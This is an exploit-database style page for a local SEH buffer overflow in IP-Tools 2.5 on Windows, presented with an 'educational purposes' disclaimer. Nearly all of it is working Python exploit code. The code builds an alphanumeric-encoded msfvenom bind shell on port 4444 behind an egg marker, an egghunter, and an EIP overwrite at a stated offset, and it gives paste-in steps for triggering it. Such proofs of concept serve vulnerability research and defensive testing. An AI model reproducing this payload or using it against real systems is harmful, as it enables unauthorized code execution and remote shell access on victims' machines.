Iptools 2.5 log to file local buffer overflow (seh) (egghunter) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-02-11 | Type : local | Platform : windows
This exploit / vulnerability Iptools 2.5 log to file local buffer overflow (seh) (egghunter) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

#!/usr/bin/env python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: IP-Tools 2.5 - Local Buffer Overflow(EggHunter) #
# Date: 2019-02-06 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe #
# Software Download #2: https://www.exploit-db.com/apps/4a83348f18a18ba34f9747648b550307-ip-tools.exe #
# Version: 2.5 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine #
# Steps : Open the APP > SNMP Scanner > paste in contents from the egg.txt into "From Addr" > "Start" > Click "Options" > #
# "Host Monitor" --> "Logging" > paste in contents from the egghunter.txt into "Log to file" > OK > Bind Shell - Port 4444 #
#------------------------------------------------------------------------------------------------------------------------------------#
# Good Characers: alphanumeric and printable special characters #
# EIP Offset Overwrite ("Log to file" field): 264 #
# Non-Participating Modules: ip_tools.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite --> #
# Stack Adjust (0x40) / RETN --> Egghunter Shellcode --> Egg Shellcode #
#------------------------------------------------------------------------------------------------------------------------------------#


##################EGG Shellcode Generation#################################

#msfvenom -p windows/shell_bind_tcp LPORT=4444 BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
#710 bytes + 8 bytes for egg identifier

egg = "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x69\x6c\x4b\x58\x6d\x52\x35\x50\x35\x50\x75\x50\x63"
egg += "\x50\x4f\x79\x4d\x35\x36\x51\x4b\x70\x71\x74\x6e\x6b"
egg += "\x36\x30\x46\x50\x6e\x6b\x66\x32\x44\x4c\x6c\x4b\x63"
egg += "\x62\x54\x54\x4c\x4b\x72\x52\x65\x78\x34\x4f\x68\x37"
egg += "\x52\x6a\x34\x66\x50\x31\x59\x6f\x4c\x6c\x57\x4c\x53"
egg += "\x51\x71\x6c\x67\x72\x54\x6c\x31\x30\x5a\x61\x58\x4f"
egg += "\x34\x4d\x56\x61\x4f\x37\x68\x62\x4a\x52\x36\x32\x66"
egg += "\x37\x4e\x6b\x36\x32\x42\x30\x6c\x4b\x50\x4a\x35\x6c"
egg += "\x4c\x4b\x72\x6c\x44\x51\x44\x38\x78\x63\x32\x68\x55"
egg += "\x51\x78\x51\x43\x61\x6e\x6b\x76\x39\x45\x70\x75\x51"
egg += "\x59\x43\x6e\x6b\x33\x79\x42\x38\x4d\x33\x65\x6a\x71"
egg += "\x59\x6e\x6b\x36\x54\x4e\x6b\x36\x61\x78\x56\x46\x51"
egg += "\x49\x6f\x4e\x4c\x79\x51\x7a\x6f\x66\x6d\x35\x51\x48"
egg += "\x47\x36\x58\x79\x70\x30\x75\x39\x66\x33\x33\x33\x4d"
egg += "\x58\x78\x57\x4b\x73\x4d\x56\x44\x53\x45\x48\x64\x61"
egg += "\x48\x4e\x6b\x72\x78\x67\x54\x57\x71\x69\x43\x73\x56"
egg += "\x6e\x6b\x54\x4c\x50\x4b\x6c\x4b\x53\x68\x37\x6c\x73"
egg += "\x31\x58\x53\x4c\x4b\x74\x44\x4e\x6b\x67\x71\x48\x50"
egg += "\x4f\x79\x70\x44\x36\x44\x76\x44\x51\x4b\x71\x4b\x55"
egg += "\x31\x46\x39\x32\x7a\x63\x61\x4b\x4f\x6b\x50\x53\x6f"
egg += "\x61\x4f\x61\x4a\x4c\x4b\x62\x32\x6a\x4b\x6e\x6d\x31"
egg += "\x4d\x63\x58\x75\x63\x54\x72\x35\x50\x45\x50\x33\x58"
egg += "\x52\x57\x33\x43\x36\x52\x73\x6f\x62\x74\x33\x58\x30"
egg += "\x4c\x31\x67\x54\x66\x63\x37\x69\x6f\x6e\x35\x78\x38"
egg += "\x4e\x70\x63\x31\x37\x70\x43\x30\x35\x79\x4f\x34\x32"
egg += "\x74\x46\x30\x51\x78\x36\x49\x4f\x70\x52\x4b\x63\x30"
egg += "\x59\x6f\x38\x55\x73\x5a\x43\x38\x70\x59\x36\x30\x49"
egg += "\x72\x59\x6d\x57\x30\x52\x70\x47\x30\x50\x50\x51\x78"
egg += "\x5a\x4a\x44\x4f\x6b\x6f\x79\x70\x39\x6f\x39\x45\x4f"
egg += "\x67\x65\x38\x44\x42\x77\x70\x64\x51\x71\x4c\x6c\x49"
egg += "\x6d\x36\x32\x4a\x72\x30\x63\x66\x56\x37\x30\x68\x68"
egg += "\x42\x4b\x6b\x64\x77\x61\x77\x59\x6f\x39\x45\x70\x57"
egg += "\x35\x38\x6d\x67\x68\x69\x65\x68\x59\x6f\x6b\x4f\x4a"
egg += "\x75\x36\x37\x75\x38\x34\x34\x58\x6c\x57\x4b\x4d\x31"
egg += "\x49\x6f\x4a\x75\x51\x47\x4e\x77\x55\x38\x32\x55\x52"
egg += "\x4e\x70\x4d\x43\x51\x39\x6f\x6e\x35\x51\x78\x70\x63"
egg += "\x32\x4d\x33\x54\x77\x70\x6e\x69\x68\x63\x30\x57\x63"
egg += "\x67\x30\x57\x55\x61\x6b\x46\x71\x7a\x56\x72\x31\x49"
egg += "\x62\x76\x6d\x32\x79\x6d\x55\x36\x6a\x67\x62\x64\x51"
egg += "\x34\x67\x4c\x73\x31\x33\x31\x6e\x6d\x71\x54\x44\x64"
egg += "\x66\x70\x39\x56\x43\x30\x77\x34\x43\x64\x76\x30\x72"
egg += "\x76\x61\x46\x50\x56\x32\x66\x30\x56\x62\x6e\x72\x76"
egg += "\x53\x66\x61\x43\x52\x76\x62\x48\x44\x39\x78\x4c\x45"
egg += "\x6f\x4f\x76\x69\x6f\x68\x55\x6b\x39\x39\x70\x42\x6e"
egg += "\x66\x36\x50\x46\x69\x6f\x36\x50\x75\x38\x33\x38\x4b"
egg += "\x37\x67\x6d\x73\x50\x69\x6f\x6a\x75\x6d\x6b\x58\x70"
egg += "\x4d\x65\x79\x32\x76\x36\x75\x38\x4e\x46\x6f\x65\x6d"
egg += "\x6d\x6f\x6d\x69\x6f\x79\x45\x35\x6c\x73\x36\x31\x6c"
egg += "\x44\x4a\x6b\x30\x79\x6b\x4d\x30\x73\x45\x74\x45\x6f"
egg += "\x4b\x30\x47\x32\x33\x31\x62\x72\x4f\x52\x4a\x37\x70"
egg += "\x72\x73\x49\x6f\x7a\x75\x41\x41"

f = open ("egg.txt", "w")
f.write(egg)
f.close()

##################EGG Hunter Shellcode Generation#################################

#encode egghunter code (looking for w00tw00t) (wow64 egghunter code produced by mona) into only alpha characters; egghunter shellcode proceeded by xor edx,edx (start egg hunting at 0x00000000)
#echo -ne "\x33\xd2\x31\xdb\x53\x53\x53\x53\xb3\xc0\x66\x81\xca\xff\x0f\x42\x52\x6a\x26\x58\x33\xc9\x8b\xd4\x64\xff\x13\x5e\x5a\x3c\x05\x74\xe9\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xe4\xaf\x75\xe1\xff\xe7" | msfvenom BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egghunter -p -
#150 bytes

egghunter = ""
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
egghunter += "\x42\x75\x4a\x49\x35\x63\x4b\x62\x30\x31\x4b\x6b"
egghunter += "\x52\x73\x56\x33\x46\x33\x46\x33\x58\x33\x49\x50"
egghunter += "\x45\x36\x6f\x71\x6a\x6a\x6b\x4f\x46\x6f\x31\x52"
egghunter += "\x66\x32\x72\x4a\x55\x76\x32\x78\x70\x33\x38\x49"
egghunter += "\x6e\x6b\x5a\x74\x55\x34\x79\x6f\x37\x63\x53\x6e"
egghunter += "\x62\x7a\x55\x6c\x66\x65\x51\x64\x4d\x39\x48\x38"
egghunter += "\x30\x77\x50\x30\x70\x30\x74\x34\x4e\x6b\x58\x7a"
egghunter += "\x6c\x6f\x51\x65\x4a\x44\x4e\x4f\x42\x55\x79\x71"
egghunter += "\x69\x6f\x6a\x47\x41\x41"

#0x00473259 : {pivot 64 / 0x40}[IP_TOOLS.EXE]

eip = "\x59\x32\x47\x00"

buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip

f = open ("egghunter.txt", "w")
f.write(buffer)
f.close()